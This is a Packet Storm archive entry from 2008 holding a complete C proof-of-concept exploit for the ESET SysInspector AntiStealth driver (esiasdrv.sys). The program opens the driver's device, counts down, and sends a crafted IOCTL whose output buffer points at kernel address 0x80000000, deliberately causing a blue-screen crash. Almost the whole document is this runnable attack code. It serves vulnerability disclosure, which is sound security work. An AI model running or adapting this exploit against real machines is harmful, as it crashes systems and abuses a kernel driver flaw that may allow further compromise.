eset-poc.txt

2008-10-01T00:00:00
ID PACKETSTORM:70520
Type packetstorm
Reporter Alex from NT Internals
Modified 2008-10-01T00:00:00

Description

                                        
                                            `////////////////////////////////////////////////////////////////////////////////////  
// +----------------------------------------------------------------------------+ //  
// | | //  
// | ESET, LLC. - http://www.eset.com/ | //  
// | | //  
// | Affected Software: | //  
// | ESET System Analyzer Tool - 1.1.1.0 | //  
// | | //  
// | Affected Driver: | //  
// | Eset SysInspector AntiStealth driver - 3.0.65535.0 - esiasdrv.sys | //  
// | Proof of Concept Exploit | //  
// | | //  
// +----------------------------------------------------------------------------+ //  
// | | //  
// | NT Internals - http://www.ntinternals.org/ | //  
// | alex ntinternals org | //  
// | 01 October 2008 | //  
// | | //  
// +----------------------------------------------------------------------------+ //  
////////////////////////////////////////////////////////////////////////////////////  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <windows.h>  
  
#define IMP_VOID __declspec(dllimport) VOID __stdcall  
#define IMP_SYSCALL __declspec(dllimport) NTSTATUS __stdcall  
  
#define OBJ_CASE_INSENSITIVE 0x00000040  
#define FILE_OPEN_IF 0x00000003  
  
#define IOCTL_METHOD_NEIGHTER 0x00223C1F  
#define BUFFER_LENGTH 0x04  
  
typedef ULONG NTSTATUS;  
  
typedef struct _UNICODE_STRING   
{  
/* 0x00 */ USHORT Length;  
/* 0x02 */ USHORT MaximumLength;  
/* 0x04 */ PWSTR Buffer;  
/* 0x08 */  
}  
UNICODE_STRING,  
*PUNICODE_STRING,  
**PPUNICODE_STRING;  
  
typedef struct _OBJECT_ATTRIBUTES  
{  
/* 0x00 */ ULONG Length;  
/* 0x04 */ HANDLE RootDirectory;  
/* 0x08 */ PUNICODE_STRING ObjectName;  
/* 0x0C */ ULONG Attributes;  
/* 0x10 */ PSECURITY_DESCRIPTOR SecurityDescriptor;  
/* 0x14 */ PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;  
/* 0x18 */  
}  
OBJECT_ATTRIBUTES,  
*POBJECT_ATTRIBUTES,  
**PPOBJECT_ATTRIBUTES;  
  
typedef struct _IO_STATUS_BLOCK  
{   
union  
{   
/* 0x00 */ NTSTATUS Status;   
/* 0x00 */ PVOID Pointer;   
};   
  
/* 0x04 */ ULONG Information;  
/* 0x08 */  
}  
IO_STATUS_BLOCK,  
*PIO_STATUS_BLOCK,  
**PPIO_STATUS_BLOCK;  
  
typedef VOID (NTAPI *PIO_APC_ROUTINE)  
(  
IN PVOID ApcContext,  
IN PIO_STATUS_BLOCK IoStatusBlock,  
IN ULONG Reserved  
);  
  
IMP_VOID RtlInitUnicodeString  
(  
IN OUT PUNICODE_STRING DestinationString,  
IN PCWSTR SourceString  
);  
  
IMP_SYSCALL NtCreateFile  
(  
OUT PHANDLE FileHandle,  
IN ACCESS_MASK DesiredAccess,  
IN POBJECT_ATTRIBUTES ObjectAttributes,  
OUT PIO_STATUS_BLOCK IoStatusBlock,  
IN PLARGE_INTEGER AllocationSize OPTIONAL,  
IN ULONG FileAttributes,  
IN ULONG ShareAccess,  
IN ULONG CreateDisposition,  
IN ULONG CreateOptions,  
IN PVOID EaBuffer OPTIONAL,  
IN ULONG EaLength  
);  
  
IMP_SYSCALL NtDeviceIoControlFile  
(  
IN HANDLE FileHandle,  
IN HANDLE Event OPTIONAL,  
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,  
IN PVOID ApcContext OPTIONAL,  
OUT PIO_STATUS_BLOCK IoStatusBlock,  
IN ULONG IoControlCode,  
IN PVOID InputBuffer OPTIONAL,  
IN ULONG InputBufferLength,  
OUT PVOID OutputBuffer OPTIONAL,  
IN ULONG OutputBufferLength  
);  
  
IMP_SYSCALL NtDelayExecution  
(  
IN BOOLEAN Alertable,  
IN PLARGE_INTEGER Interval  
);  
  
IMP_SYSCALL NtClose  
(  
IN HANDLE Handle  
);  
  
int __cdecl main(int argc, char **argv)  
{  
NTSTATUS NtStatus;  
  
HANDLE DeviceHandle;  
ULONG InputBuffer;  
  
UNICODE_STRING DeviceName;  
OBJECT_ATTRIBUTES ObjectAttributes;  
IO_STATUS_BLOCK IoStatusBlock;  
LARGE_INTEGER Interval;  
  
///////////////////////////////////////////////////////////////////////////////////////////////  
  
system("cls");  
  
printf( " +----------------------------------------------------------------------------+\n"  
" | |\n"  
" | ESET, LLC. - http://www.eset.com/ |\n"  
" | |\n"  
" | Affected Software: |\n"  
" | ESET System Analyzer Tool - 1.1.1.0 |\n"  
" | |\n"  
" | Affected Driver: |\n"  
" | Eset SysInspector AntiStealth driver - 3.0.65535.0 - esiasdrv.sys |\n"  
" | Proof of Concept Exploit |\n"  
" | |\n"  
" +----------------------------------------------------------------------------+\n"  
" | |\n"  
" | NT Internals - http://www.ntinternals.org/ |\n"  
" | alex ntinternals org |\n"  
" | 01 October 2008 |\n"  
" | |\n"  
" +----------------------------------------------------------------------------+\n\n");  
  
///////////////////////////////////////////////////////////////////////////////////////////////  
  
RtlInitUnicodeString(&DeviceName, L"\\Device\\esiasdrv");  
  
ObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);  
ObjectAttributes.RootDirectory = 0;  
ObjectAttributes.ObjectName = &DeviceName;  
ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE;  
ObjectAttributes.SecurityDescriptor = NULL;  
ObjectAttributes.SecurityQualityOfService = NULL;  
  
  
NtStatus = NtCreateFile(  
&DeviceHandle, // FileHandle  
FILE_READ_DATA | FILE_WRITE_DATA, // DesiredAccess  
&ObjectAttributes, // ObjectAttributes  
&IoStatusBlock, // IoStatusBlock  
NULL, // AllocationSize OPTIONAL  
0, // FileAttributes  
FILE_SHARE_READ | FILE_SHARE_WRITE, // ShareAccess  
FILE_OPEN_IF, // CreateDisposition  
0, // CreateOptions  
NULL, // EaBuffer OPTIONAL  
0); // EaLength  
  
/*  
if(NtStatus)  
{  
printf(" [*] NtStatus of NtCreateFile - 0x%.8X\n", NtStatus);   
return NtStatus;  
}  
*/  
  
Interval.LowPart = 0xFF676980;  
Interval.HighPart = 0xFFFFFFFF;  
  
printf("\n 3");  
NtDelayExecution(FALSE, &Interval);  
  
printf(" 2");  
NtDelayExecution(FALSE, &Interval);  
  
printf(" 1");  
NtDelayExecution(FALSE, &Interval);  
  
printf(" Upss\n\n");  
NtDelayExecution(FALSE, &Interval);  
  
  
//  
// Choose type of BSoD  
//  
  
// InputBuffer = 0x12345678;  
  
InputBuffer = 0;  
  
  
NtStatus = NtDeviceIoControlFile(  
DeviceHandle, // FileHandle  
NULL, // Event  
NULL, // ApcRoutine  
NULL, // ApcContext  
&IoStatusBlock, // IoStatusBlock  
IOCTL_METHOD_NEIGHTER, // FsControlCode  
&InputBuffer, // InputBuffer  
BUFFER_LENGTH, // InputBufferLength  
(PVOID)0x80000000, // OutputBuffer  
BUFFER_LENGTH); // OutBufferLength  
  
if(NtStatus)  
{  
printf(" [*] NtStatus of NtDeviceIoControlFile - 0x%.8X\n", NtStatus);  
return NtStatus;  
}  
  
NtStatus = NtClose(DeviceHandle); // Handle  
  
if(NtStatus)  
{  
printf(" [*] NtStatus of NtClose - 0x%.8X\n", NtStatus);   
return NtStatus;  
}  
  
return FALSE;  
}  
  
  
`